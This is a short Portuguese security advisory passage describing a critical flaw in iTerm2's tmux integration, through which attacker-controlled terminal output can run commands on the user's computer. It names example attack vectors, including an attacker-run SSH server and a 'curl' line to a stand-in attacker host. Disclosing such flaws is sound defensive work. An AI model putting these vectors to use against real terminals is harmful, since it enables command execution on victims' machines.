Uma vulnerabilidade crítica foi identificada no recurso de integração tmux do iTerm2. Um atacante capaz de produzir output para o terminal pode, em muitos casos, executar comandos no computador do usuário. Exemplos de vetores de ataque para isso seriam a conexão com um servidor SSH controlado por um atacante ou comandos como curl http://attacker.com e tail -f /var/log/apache2/referer_log.